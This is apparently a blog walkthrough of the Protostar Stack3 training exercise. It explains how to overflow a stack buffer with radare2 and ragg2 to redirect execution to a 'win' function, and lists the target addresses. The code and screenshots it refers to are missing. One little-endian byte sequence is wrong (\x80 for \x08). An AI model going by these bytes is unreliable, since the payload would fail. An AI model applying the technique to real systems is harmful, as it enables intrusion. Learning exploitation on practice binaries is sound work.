2017, Dec 18

# Exploiting Protostar Stack3

You can check previous problems here :

## Problem source code

We will work in this problem as we do not have the C source code

As you can clearly see, our binary is a 32bit ELF file, not stripped, the file isn’t protected with canaries , pic, nx or relro.

## Let’s have a look on what’s happening inside the app

We will start the app inside Radare2 and have a look in Visual Mode to try understanding how it’s working

So this is the key line  je 0x8048477;, so our main **Goal** is to override local_5ch || esp+0x5c with 0x8048477

Now we’ll use a tool in radare’s framework called ragg2, which allows us to generate a cyclic pattern called De Bruijn Sequence and check the exact offset where our payload overrides the buffer.

In visual mode you can move step by step using S until you reach the line before cmp dword [local_5ch], 0

Now let’s create a new payload with the right value of local_5ch

Look at the line call eax, we want to get the offset of eax to success the second jump, go step by step unill you reach this line, then

Also we want to know the address of ‘win’ function

Now we know that we want to put 0x08048424 in eax

Let’s rewrite our payload and exploit the binary ** Notice that we are working with a little indean so 0x8048477 will be \x77\x84\x04\x80 (Reversed) and 0x08048424 will be \x24\x84\x04\x08

And we did it ;)